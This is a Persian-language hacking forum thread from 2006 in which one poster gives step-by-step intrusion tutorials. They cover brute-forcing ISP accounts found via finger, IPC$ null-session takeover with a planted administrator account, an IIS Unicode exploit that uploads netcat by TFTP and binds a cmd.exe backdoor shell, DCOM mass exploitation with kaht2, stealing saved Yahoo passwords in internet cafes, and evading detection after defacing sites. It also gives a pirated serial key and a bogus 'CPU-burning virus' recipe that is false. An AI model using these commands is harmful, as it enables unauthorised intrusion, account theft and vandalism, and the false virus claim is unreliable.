مقالاتی در زمینه هک

**Reza P30** · 13-03-2006, 16:36

حمله: Brute Force
از طریق پورت: ۷۹
معمولا ISPها یوزرنیم های یکی میزنن. یعنی فقط رقم آخرشون فرق داره. خوب شما هم در اینجا به یه یوزرنیم احتیاج دارین که اگه یه اکانت داشته باشین می تونید راحت حدس بزنید(اگه باشه بهتره). البته اگر هم بلد نبودید می تونید از روش زیر برای پیدا کردن یوزرنیم استفاده کنید:
خوب، حالا طرز کار پورت ۷۹ رو یاد بگیرین.
دکمه ی start رو بزنید و گزینه ی Run رو انتخاب کنید. حالا تایپ کنید cmd یا command و بعد Enter رو بزنید.
در داخل cmd برای بحث در رابطه با پورت ها از دو فرمان telnet و nc استفاده می کنیم. حالا به طور مثال اگه شما بخواین با پورت ۷۹ به سرور شرکت به طور مثال کایر کانکت شین و از اون جا اکانت کش برین، باید با اون جا ارتباط برقرار کنین، از یکی از فرامین زیر استفاده کنید:
telnet kayernet.com 79
nc -v kayernet.com 79
finger .@kayernet.com
اگه شما به سرور مورد نظرتون وصل شدید فرامین زیر رو می بینید:
Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58
Interface User Mode Idle Peer Address
نکته: فرمان finger مخصوص پورت ۷۹ هستش. بنابراین دیگه لازم نیست شماره پورت رو بنویسید.
این دستورات می خوان اکانت هایی که الان کانکت هستن رو بهتون بگن که شما فقط یوزرنیم اونا رو مشاهده می کنین. البته این اطلاعات بستگی به نوع سرور داره. بعضی از سرورها مشخصات کامل تری می دن.
حالا شما یوزر نیم دارین. حالا وقته اینه که نرم افزار Unsecurev1.2 رو دانلود کنین. زمانی که فایل رو دانلود کردید چندین قسمت می بینید که من همه ی اون ها رو برای شما شرح می دم.
computer name or ip
آي پي و يا سايت اون آي سي پي كه ازش می خواین اکانت بگیرین
در قسمت پورت هم 21 رو مينويسيد كه
از پورت 79 هم می تونيد اگه باز بود استفاده كنين
curent password
لطفا به این محل دست نزنید
در قيمت يوزرنيم شما بايد يه
يوزر حدس بزنيد كه كار زياد سختي نيست چون تمام اي سي پي ها از يه رنج
خاصي استفاده ميكند مثلا شركت دونا کایر، یوزر نیم های بعضی کارت های ۵ ساعتش به صورت زیره:
5nddx5n091
5nddx5n092
5nddx5n093
5nddx5n094
5nddx5n095
dictionary file
آدرس یه پسورد لیست از کامپیوتر خودتون (در آخر یه دونه از اونا رو واسه دانلود می زارم) رو بدین. البته شما با دیکشنری میکر یه پسورد لیت بسازین.
attack option
هر 4 گزينه رو کلیک کنین
brute furce option
تو این قسمت مشخص می كنين كه فايل چطوري دنبال پسورد بگرده. مثلا حرف اول اون با عدد يا حرف شروع ميشه يا تعداد حروف پسورد چندتا هستش و ... .
حالا کانکت رو بزنید و صبر کنید تا پسورد یوزرنیم شما رو پیدا کنه
نکته: من هیچ گونه مسولیتی در قبال سوء استفاده از این مطالب ندارم

**Reza P30** · 14-03-2006, 13:55

يكي از مشكلات بزرگ ويندوز كه در Service pack هاي ويندوز هم وجود داره IPC هست

حالا ما با استفاده از اين روش كارمون را شروع ميكنيم .

يكي از نرم افزار هاي مورد نياز GFI:LANguard Security Scaner هست كه بخاطر قدرت و كارايي اين برنامه را پيشنهاد ميكنم كه فقط بايد يكسري

تغييرات رو روي آن انجام بدين اين برنامه را از سايت زير داونلود كنيد:
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU

البته ورژن 3.3 هم هست ولي من ورژن 3.2 را پيشنهاد ميكنم كه در سايت بالا ورژن 3.2 وجود دارد و سريال بالا نيز مربوط به همين ورژن هست

حالا بايد يكسري تغييرات در اين برنامه بديم .

1.option را انتخاب كنيد و به قسمت Scanning برويد و اين شاخه را انتخاب كنيد Configure ports و حالا در قسمت

Port number/range:1025

port desciription:network blackjacket

و حالا ADD PORT را بزنيد .

در قسمت New scan بايد يك Range اي پي رو اسكن كنيد تا يك اي پي با مشخصات زير پيدا شود

پرت هاي باز 1025,139 را داشته باشد .

IPC share نيز داشته باشد

حالا بايد به اين اي پي به صورت زير كانكت شويد :

1.در قسمت Run اين جمله را وارد كنيد CMD

2. دستور زير را وارد كنيد :

Net use IpadressIPC$""/user:Administrator

اگر دستور زير را دريافت كردين

Successfully The Command was completed

از اي پي مورد نظر Share گرفتين و در اختيار شماست اما در غير اينصورت Share داراي پسوورد ميباشد كه من براي كرك كردن پسسوورد از اين برنامه

استقاده ميكنم :

PQWAK

كه اين برنامه رو از سايت Download.com دريافت كنيد .

بعد از كرك از پسوورد بدست آمده اينگونه استفاده كنيد

Net use ipadressIPC$ "password"/user:administrator

در صورتيكه ميخواهيد با Telnet كانكت شويد مراحل زير را طي كنيد .

در قسمت RUN تايپ كنيد Regedit

به اين آدرس برويد HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet NTLMServer--1.0

حالا Value date اين فايل رو به اين جمله تغيير دهيد : 12

در قسمت بعدي به RUN برويد و اين دستور را تايپ كنيد TELNET

دستور زير را وارد كنيد Telnet ipadress

در ادامه اگر از شما يوزر و پسوورد خواست يوزر را Administrator و پسسورد را خالي بگذاريد

حالا احتياج به ساختن يك يوزر براي خود داريد . اين دستور را در ادامه وارد كنيد :

Net user username password/add

حالا براي قرار دادن يوزر خود در گروه ادمين ها اين دستور را وارد كنيد

Net groups Administrators username/add

تمام شد شما به هدف خود رسيده ايد اما من براي تازه كارها روش اول را پيشنهاد ميكنم

ولي دوستان ديگر ميتوانند از Telnet استفاده كنند

نكته : من هيچ مسئوليتي در مورد تغيير رجيستري نميپذيرم اگر شما قادر به Edit رجيستري نيستيد بهتره از آن يه Backup تهيه كنيد يا

در نهايت از روش اول استفاده كنيد

**Reza P30** · 14-03-2006, 14:01

با عرض سلام.امروز بهترین روش هک کردن سایت رو بهتون هدیه می کنم. سعي کرديم که کار با نت کت را براي شما واضح کنيم . خوب من در اين آموزش بصورت آنلاين ميخوام با نتکت يک سايت رو هک و ديفيس کنم که در اين آموزش شما کلا ميتونيد اين رو ياد بگيريد.

خوب در اين مثال من پورتهاي باز از شماره 1 تا 200 را اسکن کردم و فهميدم که روي اين ماشين پورتهاي 135و80و25و21و20 باز هستش .
خوب الآن من ميخوام بدونم که در پشت پورتهاي 80 و 21 چه برنامه هايي در حال اجرا هستند .

خوب الان مشاهده ميکنيم که FTP Service يعني پورت 21 احتمالا ويندوز 2000 و IIS5.0 روي آن در حال اجرا هست . خوب الآن فکر کنم بدونيد که کلا IIS يکي از پر مشکل ترين پروتکلهاست و در ضمن اين سرويس از ويندوز 2000 استفاده ميکنه و احتمال اينکه Webdav روي اين سرويس فعال باشه 80% است که من آموزش هک با Webdav هم توي سايت گذاشتم. خوب الآن سعي ميکنيم با فرستادن داده هاي نامتعارف که شايد روي IIS اصلاح نشده اند از آن استفاده کنيم . شايد توانستيم از آنها استفاده کنيم !!! چون آي آي اس از اين گونه ضعفها بسيار دارد ما نت کت را بر عليه اين ضعف به کار ميگيريم و اگر به جواب مورد نظر خود رسيديم نت کت را روي آي آي اس آپلود ميکنيم و از آن بصورت يک بکدور استفاده ميکنيم . اگر شما اطلاعاتي از اکسپلويتهاي Unicode File Traversal نداريد با يک جستجو در مورد IIS Unicode File Traversal به نتايج جالبي خواهيد رسيد . که اين نوع آموزشها را در قسمت گوگل هکينگ توضيح داده ام . شما بوسيله اين دسته از اکسپلويتها خواهيد توانست Break Out کرده و يا بشکنيد . و به شاخه c:\inetput\wwwroot دسترسي داشته باشيد و برنامه هايتان را فرستاده و يا اجرا کنيد (از طريق کامپيوتر خود) . خوب يه توضيح کوچيک ميدم که اميدوارم حواستون پرت نشده باشه با اين مباحث متفرقه بايد بگم که اين مقاله راجب هک آي آي اس نيست بلکه راجب هک سايت با نت کت است و تا اينجا فعلا از بحثهاي متفرقه اي که باز شد بيايد بيرون و حواستون رو سر بحث اصلي خود بگذاريد . خوب در شکل زير ميبينيد که از همين طريقي که گفتم من به پوشه مورد نظر دسترسي پيدا کردم . ما اين رشته رو براي آي آي اس فرستاديم و اون هم اصلاح نشده بود و در نتيجه در دام ما افتاد و .

خوب تازه ما ميخوايم شروع کنيم و نتکت رو به دايرکتوري ريشه منتقل کنيم و از آن استفاده کنيم / خوب حالا اميدوارم که همگي با TFTP آشنايي داشته باشيد . خوب ما بوسيله اين اکسپلويت نتکت رو آپلود ميکنيم و دقت کنيد که براي درخواستها از علامت + استفاده ميکنيم . براي اينکه کاملا متوجه شويد دقيقا شکل زير رو ببينيد .

Tftp -I 192.168.1.2 GET nc.exe
در حال ترانسفر شدن است به [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] url]/c+TFTP+-i+192.168.1.2+get+nc.exe خوب الان اگر نتکت به درستي آپلود شود شما پيغامي بر همين مبنا که نتکت با موفقيت فرستاده شد را دريافت خواهيد کرد . مانند شکل زير :

استفاده به عنوان بک دور
خوب تا اينجا که کار ما راحت شده . ما نتکت رو آپلود کرديم و الآن ميخواهيم از آن به عنوان يک بکدور استفاده کنيم تا بتونيم يک ارتباط از راه دور با آن برقرار کنيم . اگر مايل به اين کار باشيم صحيح ترين کار اين است که نتکت رو در حالت ليستنر روي آي آي اس روي پورت 10001 آماده کنيم . تا به ماشين قرباني وصل شويم يعني ما بجاي کلاينت قرار بگيريم . دستورات ما براي اين کار چيزي شبيه به اين خواهند بود :
nc -l -p 10001 -d -e cmd.exe
خوب الآن دستوراتي که ما براي اجراي نتکت احتياج داريم در طرف مقابل ما براي CMD را اجرا کنيم تا به نتکت دسترسي داشته باشيم براي اين کار ما بايد از دستورات زير استفاده کنيم :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] url]/c+nc+-l+-p+10001+-d+-e+cmd.exe
و الآن ما ميتونيم که نت کت رو اجرا کنيم و بقول خودمونيا حالشو ببريم :

exploit url ]
اين کار باعث ميشه که نتکت روي پورت آي آي اس 10001 فعال شود و بصورت کلاينت شما به آن وصل شويد . و الآن آيپي خودتون رو با دستور ipconfig بدست آورده و به عنوان کلاينت به Nc که در سرور IIS در حال گوش دادن به پورت 10001 ميباشد وصل ميشويد . و در اونجا هم ميتونيد از همين دستورات استفاده کنيد . در شکل زير شاهد جزييات کامل خواهيد بود .

خوب الآن ما به شل دسترسي مستقيم داريم و ميتونيم هر کاري که عشقمونه روي سرور انجام بديم .
فرستادن فايل بوسيله NC
همونطور که در آموزشهاي قبل گفتم فرستادن فايل يکي از قابليتهاي ويژه نتکت است که به اين صورت قابل انجام است . و الآن ميخوام که بدون توضيحات اضافي برم سر اصل مطلب . در کامپيوتر قرباني:
NC -l -p 1234>----.txt

در کامپيوتر خودمان :
Nc destination 1234<----.TXT

فرستادن کاراکتر C^ يعني فايلتون با موفقيت ترنسفر شده است . فايل شما ميتونه يک چيزي شبيه به اين باشه :

ما حتا ميتونيم فايل فرستاده شده خودمون رو در طرف قرباني ببينيم . اين کار از طريق پورت 1234 انجام ميشود . البته اسم اين فايل در اکثر مواقع index.htm است .

اميدوارم که اين مقاله هم مورد استفاده قرار گرفته باشه

**Reza P30** · 14-03-2006, 14:04

هك و اكسپلويت

با کمک اين exploit که از باگ dcom استفاده مي کند مي توانيد روي يک رنج ip بدون انجام هيچ کاري وارد سيستم قرباني شويد .بدون داشتن هيچ اطلاعاتي از هک و ارتباط قبلي با قرباني .البته اين باگ ازباگ هاي قديميه ولي هنوز کار مي کنه و چون مي خواستيم که شروعي باشه براي ارائه ي باگ هاي کامپايل شده ي جديد که بزودي تو سايت ارائه مي شه . براي کار با اين باگ بعد از داونلود در درايو c خودتون کپيش کنيد و بعد به منوي استارت بريد و در run رفته cmd را تايپ کنيد .بعد از ورود به cmd و با داشتن ip خود به طور مثال ip من 217.218.190.55 هستش ميرم تو command prompt مينويسم C:>kaht2.exe 217.218.190.1 217.218.190.254 که با اين کار برنامه اين رنج را براي پيدا کردن سيستم هاي نفوذ پذير چک مي کند و وارد آن ها مي شود و خط فرمان آن ها را در اختيار شما قرار مي دهد (از آن ها شل مي گيرد)

**Reza P30** · 14-03-2006, 14:29

نکته: من هیچ گونه مسولیتی در قبال این اموزش ندارم و صرفا اموزشی می باشد.
برای افرادی که از هک آگاهی چندانی ندارند این کار بسیار خطرناکه اگه از هک چیزی نمیدونی اینو نخون حالا از ما گفتن از شما نشنیدن تونش دیگه به من ربطی نداره .
برای هک کردن سایت همرا من باشین :
۱) ابتدا بعد از اتصال به شبکه در قسمت داس ویندوز علائم زیر را تایپ کنین :
C:\<>
2)بجای domain-name اسم سایتی که میخواهین هکش کنین مینویسی.اگه پورت 79 که در آخر سایت نوشته میشود باز بود شما میتونین وارد بشین و گرنه نمیشه اگه بسته بود به پورت 21 هم سری بزنین .
3) اگه پورت باز بود شما وارد میشین و یعد از وارد شدن شروع به خراب کاری میکنی حالا چه بلایی سرش بیاری اونش دیگه به من ربطی نداره چه میخوای بکنی.
**توجه ** ** توجه **
1) اگه در هنگام خراب کاری متوجه شدین که سرعت سیستمتون کاهش یافته سری خارج بشین.
2) اگه میترسی که پیدات کنن بعد از خراب کاری ریست نکنین اول دیسکانکت میشین و بعد ریست میکنین .
3) بازم میگم اگه چیزی از فرمانهای داس نمیدونی اصلا" اینو نخون .
4) نکته خیلی مهم اینکه من هیچ مسئولیتی در قبال خراب کاریاتون ندارم

**Reza P30** · 15-03-2006, 13:50

تا الآن بد ترین و آزار دهنده ترین ویرو سی که در دنیا معرفی شده ویروس کرم ریزه که نامش blaster&saser
است.این ویروس سی پی یو فرد قربانی رو میسوزونه.
من آموزش ساختن این ویروس رو به تویاد میدم.
۱:روی دسک تاپ رایت کلیک کنید.
۲:رو انتخاب کنید.new
۳: رو انتخاب کنیدtext doceument
۴:حالا وارد تکست داکیومنت خود شوید و در آن تایپ کنید
۵: cpu_567hjkblaster
6حالا ان را با پسوند bat سيو كنيد
۷: یک اسم دلخواه برای آن فایل بگذارید.
۸:بعد این فایل رو برای یکی بفرستید
اخطار: اگر سی پی یو تو نو دوست دارین به هیچ وجه این فایل رو روی دستگاه خود اجرا نکنید

**Reza P30** · 15-03-2006, 13:50

با این کار شما می توانید IP یک سایت مثل یاهو رو پیدا کنید.از منوی start وارد Run شده و تایپ کنید cmd
حالا تایپ کنید ping yahoo.com چند لحظه بعد IP سایت یاهو به شما نشان داده می شود.شما می توانید
آدرس هر سایت دیگری را به جای yahoo.com وارد کنید.همچنین لازم نیست که در ابتدای آدرس سایت www را بنویسید

**Reza P30** · 15-03-2006, 22:19

سلام
اينو در يك pm يا در yahoo وارد كنيد
با رنگ قرمز و فونت بزرگ
YYYYYYYYYYYY

**Reza P30** · 15-03-2006, 22:55

سلام دوستان

ما در
یک کافینت که تمامی سیستم های آن باهم شبکه هستن وصل شویم
ما می خواهیم که از طریق یک سیستم به تمامی سیستم های آن شبکه متصل شویم
برای این کار ما باید از نرم افزار خود ویندوز استفاده کنیم
برای شروع کار ازمنوی Start برنامهMy Network Places را انتخاب کنید و در My Network Places
تعدادی پوشه وجود دارد که هر کدام مربوت به سیستم ها که در آن شبکه وجود دارد می باشد
وشما درایو سیستم آمل هر یک ازاین سیستم ها در اختیار دارید

**Reza P30** · 15-03-2006, 23:07

سلام
ذخیره شدن پسورد و ایدی در کامپیوتر خودتان:
از منوي Start گزينه Run را انتخاب كنيد و Regedit را تايپ كنيد تا داخل محيط ويرايش ريجستري شويد حالا به اين كليك در ريجستري برويد

HKEY_CURRENT_USER\Software\Yahoo\Pager و روی Save Password دو بار كليد كنيد و عدد 100 را در آن تايپ كنيد و OK بزنيد حالا ياهو مسنجر را نگاه كنيد آخرين ID و Password ID می بينيد می توانيد باآن Login بشويد . حال بايد يك برنامه كه از قبل آمده كرده باشيد كه پسورد روي ويندوز را بخواند(007) كه با آن بتوانيد پسورد درون ياهو مسنجر را بخوانيد. اين كار شما مي توانيد در كافي نت انجام بدهيد چون پسورد شخص قبلي كسي كه قبل از شما كار مي كرده اگر هم پسورد هم Save نكرده باشه مي توانيد در بياوريد .

توجه : شما مي خواهيد اين كار را در كافي نت انجام بدهيد اما مي بينيد هر چي Regedit را در Run تايپ مي كنيد ويندوز Error به شما مي دهد اين به آن معنا است كه رجستري ويندوز پسورد داره پس شما بيايد به جاي Regedit اين را regedt32 تايپ كنيد.

نام تاپيک: مقالاتی در زمینه هک

اختيارات تاپيک

مقالاتی در زمینه هک

هك ويندوزهاي nt xp 2000

اموزش تصویری هک سایت

هك كردن بدون فرستادن فايل يا سرور

نكته هاي هك سايت

Thread Information

Users Browsing this Thread

User Tag List

قوانين ايجاد تاپيک در انجمن